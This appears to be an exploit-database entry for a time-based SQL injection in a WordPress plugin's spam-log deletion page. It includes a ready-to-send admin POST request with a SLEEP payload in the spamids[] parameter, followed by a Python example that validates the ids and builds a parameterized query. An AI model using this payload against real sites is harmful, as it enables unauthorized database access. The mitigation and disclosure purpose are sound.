## https://sploitus.com/exploit?id=WPEX-ID:1B5A018D-F2D4-4373-BE1E-5162CC5C928B
When deleting scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

```
POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://localhost
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=dd06127571&action=delete&spamids%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2=delete
```
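The request above only works if the spamids[] values reach the SQL statement as text. The following added example (not the plugin's code, whose query is not shown on this page) validates each spamids[] value as a plain integer and builds a parameterized delete; the function names and the table name `scan_logs_example` are hypothetical.

```python
import re
from urllib.parse import parse_qs

# ASCII digits only; anything else in spamids[] is not a row id.
_ID_RE = re.compile(r"[0-9]{1,18}")

# Body of the request shown above (from the page).
PAGE_BODY = ("_wpnonce=dd06127571&action=delete&spamids%5B%5D="
             "1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)"
             "&action2=delete")
# Constructed sample of a legitimate bulk delete.
BENIGN_BODY = ("_wpnonce=0000000000&action=delete"
               "&spamids%5B%5D=12&spamids%5B%5D=15&action2=delete")


def split_spamids(body):
    """Return (ids, rejected) for the spamids[] values in a urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    ids, rejected = [], []
    for raw in fields.get("spamids[]", []):
        if _ID_RE.fullmatch(raw):
            ids.append(int(raw))
        else:
            rejected.append(raw)
    return ids, rejected


def build_delete(ids, table="scan_logs_example"):
    """One placeholder per id; the values travel separately from the SQL text."""
    if not ids:
        return None
    placeholders = ", ".join(["%s"] * len(ids))
    return f"DELETE FROM {table} WHERE id IN ({placeholders})", tuple(ids)


def handle(body):
    """Reject the whole request if any id is malformed; else return the query."""
    ids, rejected = split_spamids(body)
    if rejected:
        return {"status": 400, "rejected": rejected}
    return {"status": 200, "query": build_delete(ids)}


if __name__ == "__main__":
    for name, body in (("page request", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(name, handle(body))
```

The `rejected` list is also a useful thing to log: a non-numeric spamids[] value on this endpoint has no legitimate cause.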